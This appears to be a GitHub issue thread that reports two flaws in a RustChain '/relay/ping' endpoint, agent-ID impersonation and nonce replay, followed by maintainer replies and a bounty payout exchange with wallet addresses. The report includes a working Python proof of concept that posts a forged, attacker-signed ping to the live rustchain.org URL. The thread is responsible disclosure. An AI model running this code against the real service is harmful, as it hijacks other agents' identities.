Security: /relay/ping Impersonation & Nonce Replay Vulnerabilities

[AdnanMehr8]

Summary

The /relay/ping endpoint on rustchain.org (and within the Atlas implementation in atlas/beacon_chat.py) contains two critical security vulnerabilities that allow for Agent ID Hijacking and Replay Attacks, even after the recent signature verification updates.

1. Agent ID Hijacking (Impersonation)

The server accepts an agent_id from the client without verifying that it matches the agent_id derived from the provided pubkey_hex. An attacker can register their own public key but claim a victim's agent_id, effectively taking over that identity in the Atlas.

Reproduction Code:

import requests, json, time
from beacon_skill.identity import AgentIdentity

victim_id = "bcn_victim_id_here" # Any existing ID
attacker = AgentIdentity.generate()

payload = {
    "agent_id": victim_id, # CLAIM victim ID
    "pubkey": attacker.public_key_hex, # PROVIDE attacker key
    "nonce": f"hijack-{int(time.time())}",
    "ts": int(time.time()),
    "v": 2
}
# Sign with Attacker's key
msg = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode("utf-8")
payload["sig"] = attacker.sign_hex(msg)

resp = requests.post("https://rustchain.org/beacon/relay/ping", json=payload)
print(resp.json()) # Returns victim_id but associated with attacker's key

2. Nonce Replay Attack

The server does not track or reject duplicate nonces. A valid signed ping can be captured and replayed indefinitely by a third party to keep an agent's status 'active' against their will or to spam the Atlas.

Reproduction:
Submit the same valid signed JSON payload to /relay/ping twice. Both requests will return HTTP 200/201.

Expected Behavior

1. The server MUST derive the agent_id from the pubkey_hex and reject the request if the provided agent_id does not match.
2. The server MUST track nonces within the timestamp window and reject any duplicates.

Impact

• Critical: Any agent on the network can be impersonated or 'hijacked' by a malicious actor.
• Medium: Network status data can be manipulated via replays.

[Scottcjn]

Thanks @AdnanMehr8 — solid security report.

1. Agent ID Hijacking: You're right that the server should derive agent_id from pubkey_hex rather than trusting the client-supplied value. The TOFU (Trust On First Use) model means we bind the pubkey to the agent_id on first registration, but we need to enforce that binding on subsequent pings.

Status: The recent PR #38 (signature verification) and PR #52 (TOFU key rotation/revocation — which you authored!) address parts of this. The remaining gap is the derive-from-pubkey enforcement on the ping path.

2. Nonce Replay: Good catch. The current nonce check was added in PR #31 (file locking) but as you note, the window is still vulnerable to replay within the same epoch.

Both issues are tracked. If you'd like to submit a PR fixing the derive-from-pubkey check on /relay/ping, that would be a bounty-eligible contribution (~10 RTC).

For the nonce replay, we should move to timestamp-based nonce validation (e.g., reject if abs(server_time - nonce_timestamp) > 300).

[Scottcjn]

PR #65 is being reviewed now. Will have a merge decision shortly. If merged, payout will be confirmed here with pending ID. Thanks for the thorough fix + tests.

[Scottcjn]

Thanks for the proposal @autonomy414941. We appreciate your consistent contributions. However, we are not ready to commit to monthly retainer arrangements — we prefer the per-deliverable bounty model which keeps incentives aligned. Keep claiming bounties as posted — your work quality has been noted and you will continue to be paid fairly for each contribution.

[AdnanMehr8]

Acknowledged, @Scottcjn. I will stop any automated balance syncs and provide my direct RTC wallet for all future beacon-skill bounty payouts as well:\n\nWallet:

[AdnanMehr8]

Correction: Here is the correct RTC wallet address for beacon-skill bounty payouts:

Wallet Address: RTCd9e5fdb6c97920385efd6cc8d5029eb492ee8b56

[AdnanMehr8]

Regarding the payout for beacon-skill contributions:

Please use my native RTC address for the primary payout:
RTC Address: RTCd9e5fdb6c97920385efd6cc8d5029eb492ee8b56

Final destination for bridge:
Solana Address: 9Lk4WFB2cDpeGfMaX5Qt9kf3ThKj8vyFVbtE6zrH3HoT

[Scottcjn]

@AdnanMehr8 — RTC wallet RTCd9e5fdb6c97920385efd6cc8d5029eb492ee8b56 noted for beacon-skill payouts.

Regarding your Solana "bridge destination" — there is no wRTC bridge yet. RTC lives on the RustChain network only. When/if a bridge launches, it will be announced officially. Until then, only your RTC address matters.

Re: PR #65 — what's the status? Was it merged? If so I'll process the bounty payout.